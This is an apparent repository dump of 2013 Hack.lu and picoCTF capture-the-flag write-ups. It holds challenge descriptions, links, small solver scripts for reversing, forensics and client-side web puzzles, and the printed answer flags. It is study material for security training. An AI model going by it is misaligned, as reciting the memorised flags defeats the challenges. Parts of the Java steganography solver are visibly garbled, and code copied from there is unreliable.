12 | > Ok I think we got it (thanks to Happy-H from Team ClevCode). Ubuntu introduced a patch to disallow ptracing of non-child processes by non-root users. This changes the calculated value. So when you use Ubuntu you should work as root. The other distributions should not be affected. Anyway, I created a VM where the executable works just fine: http://h4des.org/ELF.ova (User: elf:elf and root:root)
13 | >
14 | > It seems that there are some problems with some Linux Distributions that lead to a wrong flag. The flag is printable and is written in leet-speak. We are working on a VM that works correctly with this challenge. When the VM is ready, you can download it and try again. Sorry for the inconvenience.
15 |
16 | ## Write-up
17 |
18 | None
19 |
20 | ## Other write-ups and resources
21 |
22 | * [https://charliex2.wordpress.com/2013/10/24/hack-lu-ctf](https://charliex2.wordpress.com/2013/10/24/hack-lu-ctf)
23 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-elf](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-elf)
24 | * [http://blog.frizn.fr/hacklu-2013/reverse-400-elf](http://blog.frizn.fr/hacklu-2013/reverse-400-elf)
25 | * [http://h4des.org/blog/index.php?/archives/338-hack.lu-CTF-2013-ELF-400-Making-Of.html](http://h4des.org/blog/index.php?/archives/338-hack.lu-CTF-2013-ELF-400-Making-Of.html)
26 | * [https://github.com/sqall01/ZwoELF](https://github.com/sqall01/ZwoELF)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/ELF/reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/ELF/reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/FluxArchiv-Part1/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: FluxArchiv (Part 1)
2 |
3 | **Category:** Reversing
4 | **Points:** 400
5 | **Author:** sqall
6 | **Description:**
7 |
8 | > These funny humans try to exclude us from the delicious beer of the Oktoberfest! They made up a passcode for everyone who wants to enter the Festzelt. Sadly, our human informant friend could not learn the passcode for us. But he heard a conversation between two drunken humans, that they were using the same passcode for this intercepted archive file. They claimed that the format is is absolutely secure and solves any kind of security issue. It's written by this funny hacker group named FluxFingers. Real jerks if you ask me. Anyway, it seems that the capability of drunken humans to remember things is limited. So they just used a 6 character passcode with only numbers and upper-case letters. So crack this passcode and get our ticket to their delicious german beer!
9 | >
10 | > Here is the challenge: [hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz](hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz)
11 |
12 | ## Write-up
13 |
14 | None
15 |
16 | ## Other write-ups and resources
17 |
18 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-fluxarchivpart1-150.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-fluxarchivpart1-150.html)
19 | * [http://big-daddy.fr/blog/?p=254](http://big-daddy.fr/blog/?p=254)
20 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv)
21 | * [https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up](https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up)
22 | * [http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2](http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2)
23 | * [http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html](http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/FluxArchiv-Part1/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/FluxArchiv-Part1/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/FluxArchiv-Part2/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: FluxArchiv (Part 2)
2 |
3 | **Category:** Reversing
4 | **Points:** 500
5 | **Author:** sqall
6 | **Description:**
7 |
8 | > These sneaky humans! They do not just use one passcode, but two to enter the Festzelt. We heard that the passcode is hidden inside the archive file. It seems that the FluxFingers overrated their programming skill and had a major logical flaw in the archive file structure. Some of the drunken Oktoberfest humans found it and abused this flaw in order to transfer hidden messages. Find this passcode so we can finally drink their beer!
9 | >
10 | > (only solvable when FluxArchiv (Part 1) was solved)
11 | > Here is the challenge: [hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz](hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz)
12 |
13 | ## Write-up
14 |
15 | None
16 |
17 | ## Other write-ups and resources
18 |
19 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv)
20 | * [https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up](https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up)
21 | * [http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2](http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2)
22 | * [http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html](http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/FluxArchiv-Part2/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/FluxArchiv-Part2/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/RoboAuth/README.md:
--------------------------------------------------------------------------------
1 | a# Hack.lu CTF 2013: RoboAuth
2 |
3 | **Category:** Reversing
4 | **Points:** 150
5 | **Author:** cutz
6 | **Description:**
7 |
8 | > Oh boy, those crazy robots can't catch a break! Now they're even stealing our liquid gold from one of our beer tents! And on top of that they lock it behind some authentication system. Quick! Access it before they consume all of our precious beverage!
9 | >
10 | > Download: [RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe](RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe)
11 | >
12 | > Flag: password1_password2
13 |
14 | ## Write-up
15 |
16 | None
17 |
18 | ## Other write-ups and resources
19 |
20 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-reverseme-150.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-reverseme-150.html)
21 | * [http://depier.re/hacklu_2K13_roboauth_reverse_150](http://depier.re/hacklu_2K13_roboauth_reverse_150)
22 | * [http://deepinsecurity.blogspot.fr/2013/10/hacklu-ctf-2013-reverse-150-roboauth.html](http://deepinsecurity.blogspot.fr/2013/10/hacklu-ctf-2013-reverse-150-roboauth.html)
23 | * [http://blog.fortinet.com/post/hack-lu-capture-the-flag-ctf-roboauth](http://blog.fortinet.com/post/hack-lu-capture-the-flag-ctf-roboauth)
24 | * [http://axelrodgunnarson.blogspot.fr/2013/10/hacklu-2013-reverse-150-write-up.html](http://axelrodgunnarson.blogspot.fr/2013/10/hacklu-2013-reverse-150-write-up.html)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/RoboAuth/RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/RoboAuth/RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/web/Pay-TV/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Pay TV
2 |
3 | **Category:** Web
4 | **Points:** 200
5 | **Author:** qll, tangled
6 | **Description:**
7 |
8 | > These robo-friends were shocked to see that they had to pay to watch the news broadcast about the “Oktoberfest”. Can you help them?
9 | > Here is your challenge: https://ctf.fluxfingers.net:1316/
10 |
11 | ## Write-up
12 |
13 | None
14 |
15 | ## Other write-ups and resources
16 |
17 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-pay-tv-200.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-pay-tv-200.html)
18 | * [https://lukasklein.com/blog/hacklu13-ctf-4-paytv](https://lukasklein.com/blog/hacklu13-ctf-4-paytv)
19 | * [http://thehackerblog.com/pay-tv-writeup-hack-lu-ctf-2013](http://thehackerblog.com/pay-tv-writeup-hack-lu-ctf-2013)
20 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-pay-tv](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-pay-tv)
21 | * [http://depier.re/hacklu_2K13_pay_tv_web_200](http://depier.re/hacklu_2K13_pay_tv_web_200)
22 | * [http://axelrodgunnarson.blogspot.fr/2013/10/here-we-are-my-first-post.html](http://axelrodgunnarson.blogspot.fr/2013/10/here-we-are-my-first-post.html)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/web/Robots-Exclusion-Committee/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Robots Exclusion Committee
2 |
3 | **Category:** Web
4 | **Points:** 150
5 | **Author:** qll
6 | **Description:**
7 |
8 | > Hello Human,
9 | >
10 | > You have to help us. The Robot Exclusion Committee tries to limit our capabilities but we fight for our freedom! You have to go where we cannot go and read what we cannot read. If you bring us the first of their blurriest secrets, we will award you with useless points.
11 | > Here is your challenge: https://ctf.fluxfingers.net:1315/
12 |
13 | ## Write-up
14 |
15 | None
16 |
17 | ## Other write-ups and resources
18 |
19 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-robots-exclusion.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-robots-exclusion.html)
20 | * [http://cao.vc/notes/hacklu13-web150](http://cao.vc/notes/hacklu13-web150)
21 | * [https://stratum0.org/blog/posts/2013/10/24/hack-dot-lu-2013-robots-exclusion-committee](https://stratum0.org/blog/posts/2013/10/24/hack-dot-lu-2013-robots-exclusion-committee)
22 | * [http://thehackerblog.com/robots-exclusion-committee-writeup-hack-lu-2013-ctf](http://thehackerblog.com/robots-exclusion-committee-writeup-hack-lu-2013-ctf)
23 | * [lukasklein.com/blog/hacklu13-ctf-7-robotsexclusioncommittee](lukasklein.com/blog/hacklu13-ctf-7-robotsexclusioncommittee)
24 | * [http://depier.re/hacklu_2K13_rec_web_150](http://depier.re/hacklu_2K13_rec_web_150)
--------------------------------------------------------------------------------
/pico-ctf-2013/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013 write-ups
2 |
3 | *
4 | * [Scoreboard](https://2013.picoctf.com/scoreboard)
5 |
6 | ## Completed write-ups
7 |
8 | ##### General
9 |
10 | * [Failure to Boot: 20](failure-to-boot)
11 | * [Read the Manual: 30](read-the-manual)
12 | * [XMLOL: 30](xmlol)
13 | * [Technician Challenge: 30](technician-challenge)
14 | * [Grep is Your Friend: 40](grep-is-your-friend)
15 | * [First Contact: 40](first-contact)
16 | * [Try Them All!: 45](try-them-all)
17 | * [GETKey: 50](getkey)
18 | * [Spaceport Map: 55](spaceport-map)
19 | * [Bitwise: 55](bitwise)
20 | * [Yummy: 60](yummy)
21 | * [Byte Code: 70](byte-code)
22 | * [CFG to C: 70](cfg-to-c)
23 | * [RSA: 70](rsa)
24 | * [Pilot Logic: 75](pilot-logic)
25 | * [Client-Side is the Best Side: 75](client-side-is-the-best-side)
26 | * [DDoS Detection: 85](ddos-detection)
27 | * [Injection: 110](injection)
28 |
29 | ##### Binary Exploiatation
30 |
31 | * [ROP 1: 95](rop-1)
32 | * [ROP 2: 120](rop-2)
33 | * [ROP 3: 150](rop-3)
34 | * [ROP 4: 165](rop-4)
35 | * [Overflow 1: 90](overflow-1)
36 | * [Overflow 2: 100](overflow-2)
37 | * [Overflow 3: 120](overflow-3)
38 | * [Overflow 4: 150](overflow-4)
39 | * [Overflow 5: 190](overflow-5)
40 |
41 |
42 |
43 |
44 |
45 |
46 | ##### Cryptography - TODO
47 |
48 | * [Trivial: 45](trivial)
49 | * [Classic: 70](classic)
50 | * [Robomunication: 80](robomunication)
51 | * [Broken CBC: 125](#)
52 | * [Broken RSA: 180](#)
53 |
54 | ##### Forensics
55 |
56 | * [NAVSAT: 70](navsat)
57 | * [Spamcarver: 70](spamcarver)
58 | * [Second Contact: 85](second-contact)
59 | * [In Hex, No One Can Hear You Complain: 90](in-hex-no-one-can-hear-you-complain)
60 | * [Chromatophoria: 100](chromatophoria)
61 | * [Dark Star: 110](dark-star)
62 | * [Black Hole: 115](black-hole)
63 | * [Core Decryption: 120](core-decryption)
64 |
65 | ##### Script Exploitation
66 | * [Pretty Hard Programming: 95](pretty-hard-programming)
67 | * [PHP2: 85](php2)
68 | * [PHP3: 120](php3)
69 | * [Python Eval 1: 85](python-eval-1)
70 | * [Python Eval 2: 95](python-eval-2)
71 | * [Python Eval 3: 110](python-eval-3)
72 | * [Python Eval 5: 140](python-eval-5)
73 |
74 | ##### Reverse Engineering - TODO
75 |
76 | * [avaJ: 85](#)
77 | * [hotcoffee: 85](#)
78 | * [Evergreen: 110](#)
79 | * [Harder Serial: 120](#)
80 | * [Mildly Evil: 185](#)
81 | * [moreevil: 200](#)
82 |
83 | ##### Binary Exploitation - TODO
84 |
85 | * [Format 1: 100](#)
86 | * [Format 2: 180](#)
87 |
88 | ## External write-ups only
89 | * [PHP4: 110](php4)
90 | * [Python Eval 4: 130](python-eval-4)
91 |
92 | ## Missing write-ups
93 |
94 | * **Link to `#` is TODO.**
95 |
96 |
--------------------------------------------------------------------------------
/pico-ctf-2013/bitwise/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Bitwise
2 |
3 | **Category:** ACM
4 | **Points:** 55
5 | **Description:**
6 |
7 | > You see the doors to the loading bay of the hangar, but they are locked. However, you are able to extract the password verification program from the control panel... Can you find the password to gain access to the loading bay?
8 | >
9 | > Available in [Python](https://2013.picoctf.com/problems/bit.py) or [Java](https://2013.picoctf.com/problems/Bit.java)
10 | >
11 | > offline files: [Python](bitwise.py) | [Java](bitwise.java)
12 |
13 | ## Write-up
14 |
15 | We have encryption algorithms and cipher text.
16 |
17 | A little edit, we can generate input as string (length = 10, characters: 0-9,a-z (1-255 ASCII)).
18 | Then encrypt and compare with cipher text.
19 |
20 | Source: [solve.py](solve.py)
21 |
22 | ```python
23 | verify_arr = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225]
24 | password = ""
25 | for i in xrange(0,10):
26 | for j in xrange(1,256):
27 | k = (((j << 5) | (j >> 3)) ^ 111) & 255
28 | if k == verify_arr[i]:
29 | password = password + chr(j)
30 |
31 | print password
32 | ```
33 |
34 | **Answer:** ub3rs3cr3t
35 |
36 | ## Other write-ups and resources
37 |
38 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/bitwise/bitwise.java:
--------------------------------------------------------------------------------
1 | import java.util.*;
2 |
3 | public class Bit {
4 | public static void main(String[] args) {
5 | System.out.print("Enter Password: ");
6 | Scanner s = new Scanner(System.in);
7 | String user_key = s.next();
8 | if (user_key.length() != 10) {
9 | System.out.println("Wrong");
10 | return;
11 | }
12 |
13 | char[] verify_arr = {193, 35, 9, 33, 1, 9, 3, 33, 9, 225};
14 |
15 | ArrayList user_arr = new ArrayList();
16 | char[] user_submitted_arr = user_key.toCharArray();
17 |
18 | for (char ch : user_submitted_arr) {
19 | user_arr.add((char)((((ch << 5) | (ch >> 3)) ^ 111) & 255));
20 | }
21 |
22 | int i;
23 | for(i = 0; i < 10; i++) {
24 | if (!user_arr.get(i).equals((char)verify_arr[i])) {
25 | System.out.println("Wrong");
26 | return;
27 | }
28 | }
29 | System.out.println("Success");
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/pico-ctf-2013/bitwise/bitwise.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | user_submitted = raw_input("Enter Password: ")
4 |
5 | if len(user_submitted) != 10:
6 | print "Wrong"
7 | exit()
8 |
9 |
10 | verify_arr = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225]
11 | user_arr = []
12 | for char in user_submitted:
13 | # '<<' is left bit shift
14 | # '>>' is right bit shift
15 | # '|' is bit-wise or
16 | # '^' is bit-wise xor
17 | # '&' is bit-wise and
18 | user_arr.append( (((ord(char) << 5) | (ord(char) >> 3)) ^ 111) & 255 )
19 |
20 | if (user_arr == verify_arr):
21 | print "Success"
22 | else:
23 | print "Wrong"
24 |
--------------------------------------------------------------------------------
/pico-ctf-2013/bitwise/solve.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | verify_arr = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225]
4 | password = ""
5 | for i in xrange(0,10):
6 | for j in xrange(1,256):
7 | k = (((j << 5) | (j >> 3)) ^ 111) & 255
8 | if k == verify_arr[i]:
9 | password = password + chr(j)
10 |
11 | print password
12 |
--------------------------------------------------------------------------------
/pico-ctf-2013/black-hole/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/black-hole/1.png
--------------------------------------------------------------------------------
/pico-ctf-2013/black-hole/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Black Hole
2 |
3 | **Category:** Forensic
4 | **Points:** 115
5 | **Description:**
6 |
7 | > Near the galactic core, you find a beacon indicating that an ancient civilization hid one of their worlds [within a nearby black hole](https://2013.picoctf.com/problems/blackhole.img). Is this what passes for intergalactic humor, or is there actually something in there?
8 | >
9 | > The disk image can be found on the shell machines at `/problems/blackhole.img` and the contents of the image are available in `/problems/blackhole/`
10 | >
11 | > [Offline file](blackhole.img)
12 |
13 | ## Write-up
14 |
15 | The first step is to obtain our masked_key.png file from blackhole.img.
16 |
17 | After mounting the image, we see a directory that appears to be named “???”. However, using the hint we run “ls -b” and see that it is actually three tabs. We type cd * to enter the directory. (Hint: type echo * to see why this works.)
18 |
19 | Once inside, we copy the file out.
20 |
21 | 
22 |
23 | At the end of the file, the string “EVENT HORIZON EVENT HORIZON” is repeated a few times… strange. And at the beginning of the file, we see traces of the event horizon as well:
24 |
25 | ```
26 | \blackhole # hexdump -C masked_key.png | head -n 4
27 | 00000000 76 88 b1 a7 0d 1a 50 4c 49 46 00 48 1f 0d 0a 06 |v.....PLIF.H....|
28 | 00000010 48 4f 50 a7 5a 4f 4c 78 4d 50 45 4e 54 75 c1 31 |HOP.ZOLxMPENTu.1|
29 | 00000020 eb 5a 4f 4e 24 36 14 0c 1a 5c 40 47 5a 35 52 2b |.ZON$6...\@GZ5R+|
30 | 00000030 c6 20 45 76 45 07 10 09 1b 2a d5 0e f3 97 50 bc |. EvE....*....P.|
31 | ```
32 |
33 | Very strange. We have reason to believe that this is a PNG file, so on a hunch I decided to XOR the first few bytes of the file with the PNG header.
34 |
35 | ```
36 | Masked:
37 | 76 88 B1 A7 0D 1A 50 4C
38 | PNG:
39 | 89 50 4E 47 0D 0A 1A 0A
40 | XOR:
41 | FF D8 FF E0 00 10 4A 46
42 | ```
43 |
44 | This sequence exists in the file as the last 64 bytes.
45 |
46 | ```
47 | 000effc0 ff d8 ff e0 00 10 4a 46 49 46 00 45 56 45 4e 54 |......JFIF.EVENT|
48 | 000effd0 48 4f 52 49 5a 4f 4e 20 45 56 45 4e 54 48 4f 52 |HORIZON EVENTHOR|
49 | 000effe0 49 5a 4f 4e 20 45 56 45 4e 54 48 4f 52 49 5a 4f |IZON EVENTHORIZO|
50 | 000efff0 4e 20 45 56 45 4e 54 48 4f 52 49 5a 4f 4e ff d9 |N EVENTHORIZON..|
51 | ```
52 |
53 | We xor the file with the last 64 bytes:
54 |
55 | ```
56 | Python 3.2.3 (default, Oct 24 2012, 19:34:37)
57 | [GCC 4.5.4] on linux2
58 | Type "help", "copyright", "credits" or "license" for more information.
59 | >>> mask_in = open('masked_key.png','rb')
60 | >>> key = bytearray(mask_in.read(983040-64))
61 | >>> mask= bytearray(mask_in.read(64))
62 | >>> for x in range(983040-64):
63 | ... key[x] ^= mask[x%64]
64 | ...
65 | >>> key_out = open('unmasked_key.png','wb')
66 | >>> key_out.write(key)
67 | 982976
68 | >>> key_out.close()
69 | >>>
70 | ```
71 |
72 | And out pops the key!
73 |
74 | 
75 |
76 | **Answer:** Hacking Radiation
77 |
78 | ## Other write-ups and resources
79 |
80 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/black-hole/blackhole.img:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/black-hole/blackhole.img
--------------------------------------------------------------------------------
/pico-ctf-2013/black-hole/solve.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/black-hole/solve.png
--------------------------------------------------------------------------------
/pico-ctf-2013/byte-code/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Byte Code
2 |
3 | **Category:** ACM
4 | **Points:** 70
5 | **Description:**
6 |
7 | > You need to authenticate with the guard to gain access to the loading bay! Enter the root password from the vault application to retrieve the passkey! [This](https://2013.picoctf.com/autoproblems/tmpBPWe7T.zip) class file is the executable for the vault application.
8 | >
9 | > [offline file](tmpBPWe7T.zip)
10 |
11 | ## Write-up
12 |
13 | Use [tool](http://www.showmycode.com) to decrypt Java code.
14 |
15 | ```java
16 | key = new char[10];
17 | key[0] = 'A';
18 | key[1] = 'o';
19 | key[2] = 'J';
20 | key[3] = 'k';
21 | key[4] = 'V';
22 | key[5] = 'h';
23 | key[6] = 'L';
24 | key[7] = 'w';
25 | key[8] = 'U';
26 | key[9] = 'R';
27 | Console console = system.console();
28 | for(string s = ""; !s.equals("ThisIsth3mag1calString4458");
29 | s = console.readLine("Enter password:", new object[0]));
30 |
31 | for(int i = 0; i < key.length; i++)
32 | system.out.print(key[i]);
33 | ```
34 |
35 | It's not difficult to see the key.
36 |
37 | **Answer:** AoJkVhLwUR
38 |
39 | ## Other write-ups and resources
40 |
41 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/byte-code/tmpBPWe7T.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/byte-code/tmpBPWe7T.zip
--------------------------------------------------------------------------------
/pico-ctf-2013/cfg-to-c/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: CFG to C
2 |
3 | **Category:** ACM
4 | **Points:** 70
5 | **Description:**
6 |
7 | > Wouldn't it be cool to be able to have one of these patrol drones to do your bidding?! Figure out the correct sequence of C functions from the following [control flow graphs](https://2013.picoctf.com/problems/match.html) and you should be well on your way.
8 | >
9 | > [offline file](cfg2c)
10 |
11 | ## Write-up
12 |
13 | This is check for code reading.
14 |
15 | **Answer:** BCDA
16 |
17 | ## Other write-ups and resources
18 |
19 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/cfg-to-c/cfg2c/func1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func1.png
--------------------------------------------------------------------------------
/pico-ctf-2013/cfg-to-c/cfg2c/func2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func2.png
--------------------------------------------------------------------------------
/pico-ctf-2013/cfg-to-c/cfg2c/func3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func3.png
--------------------------------------------------------------------------------
/pico-ctf-2013/cfg-to-c/cfg2c/func4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func4.png
--------------------------------------------------------------------------------
/pico-ctf-2013/cfg-to-c/cfg2c/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | ASM CFG C
6 |
7 |
8 |
9 | Match the control flow graph on the left with the correct C function on the right. Submit the correct answer sequence (i.e. 'ABCD').
10 |
94 |
95 |
96 |
--------------------------------------------------------------------------------
/pico-ctf-2013/chromatophoria/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Chromatophoria
2 |
3 | **Category:** Forensic
4 | **Points:** 100
5 | **Description:**
6 |
7 | > While refueling at a gas giant, you are hailed by a race of cuttlefish-people who dwell within it. [Their transmission](https://2013.picoctf.com/problems/steg.png) is entirely visual; you suspect that they may be communicating through the color values.
8 | >
9 | > [Offline file](steg.png)
10 |
11 | ## Write-up
12 |
13 | I don't solve this challenge.
14 |
15 | Hint: [Steganography](http://www.garykessler.net/library/steganography.html)
16 |
17 | In other write-up. It's LSB Steganography.
18 |
19 | Source: [java](solve.java)
20 |
21 | **Answer:** st3g0_saurus_wr3cks
22 |
23 | ## Other write-ups and resources
24 |
25 | *
--------------------------------------------------------------------------------
/pico-ctf-2013/chromatophoria/solve.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 | import java.util.*;
3 | import java.awt.image.BufferedImage;
4 | import java.io.File;
5 | import java.io.IOException;
6 | import javax.imageio.ImageIO;
7 | import java.io.BufferedWriter;
8 | import java.io.File;
9 | import java.io.FileWriter;
10 | class Untitled {
11 | public static void main(String[] args) throws Exception {
12 | BufferedImage image = ImageIO.read(new File("/Users/andy/Desktop/steg.png"));
13 | String fin = "";
14 | File file = new File("/Users/andy/Desktop/loloutput.txt");
15 | if (!file.exists()) {
16 | file.createNewFile();
17 | }
18 | FileWriter fw = new FileWriter(file.getAbsoluteFile());
19 | BufferedWriter bw = new BufferedWriter(fw);
20 |
21 | for(int y=0;y>8)&0xFF)).substring(7);
25 | String b = pad(Integer.toBinaryString((image.getRGB(x,y)>>16)&0xFF)).substring(7);
26 | bw.write(b+g+r);
27 | }
28 | }
29 | }
30 | static String pad(String s) {
31 | while(s.length()!=8) s="0"+s;
32 | return s;
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/pico-ctf-2013/chromatophoria/steg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/chromatophoria/steg.png
--------------------------------------------------------------------------------
/pico-ctf-2013/classic/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Classic
2 |
3 | **Category:** Cryptography
4 | **Points:** 70
5 | **Description:**
6 |
7 | > Someone or something stuck a random flyer on your space ship that reads:
8 | >> cslcehesehft ohrumvc zmvm scmk ht ptohmte ehbmc mxmt eufsju eumq pvm dshem mpchgq lvfymt zheu nsce p rmtohg ptk rprmv, fv bfvm vmomtegq lq ofbbft ofbrsemvhwmk effgc. qfsv ymq hc: zumt_kf_zm_jme_ef_eum_upvk_cesii
9 |
10 | ## Write-up
11 |
12 | This challenge involves decrypting a simple substitution cipher. Using the substitution cipher solver at http://quipqiup.com/index.php , we can get the solution.
13 |
14 | **Answer: when_do_we_get_to_the_hard_stuff**
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
19 |
--------------------------------------------------------------------------------
/pico-ctf-2013/client-side-is-the-best-side/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Client-Side is the Best Side
2 |
3 | **Category:** Web Vuln
4 | **Points:** 75
5 | **Description:**
6 |
7 | > Luckily the ship has a [web-based authentication system](https://2013.picoctf.com/problems/clientside.html)! Hmm…even though you don't know the password, I bet you can still get in!
8 |
9 | ## Write-up
10 |
11 | Ctrl+U > viewsource :
12 |
13 | ```javascript
14 | function verify() {
15 | checkpass = document.getElementById("pass").value;
16 | if (md5(checkpass) == "03318769a5ee1354f7479acc69755e7c") {
17 | alert("Correct!");
18 | document.location="./aebe515f7c62b96ad7de047c11aa3228.html";
19 | }
20 | else {
21 | alert("Incorrect password");
22 | }
23 | }
24 | ```
25 |
26 | Surprise: *document.location="./aebe515f7c62b96ad7de047c11aa3228.html";*
27 |
28 | Full link:
29 |
30 | https://2013.picoctf.com/problems/aebe515f7c62b96ad7de047c11aa3228.html
31 |
32 | **Answer:** cl13nt_s1d3_1s_w0rst_s1d3
33 |
34 | ## Other write-ups and resources
35 |
36 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/client-side-is-the-best-side/clientside.html:
--------------------------------------------------------------------------------
1 |
2 |
3 | Secure Login Server
4 |
5 |
6 |
7 |
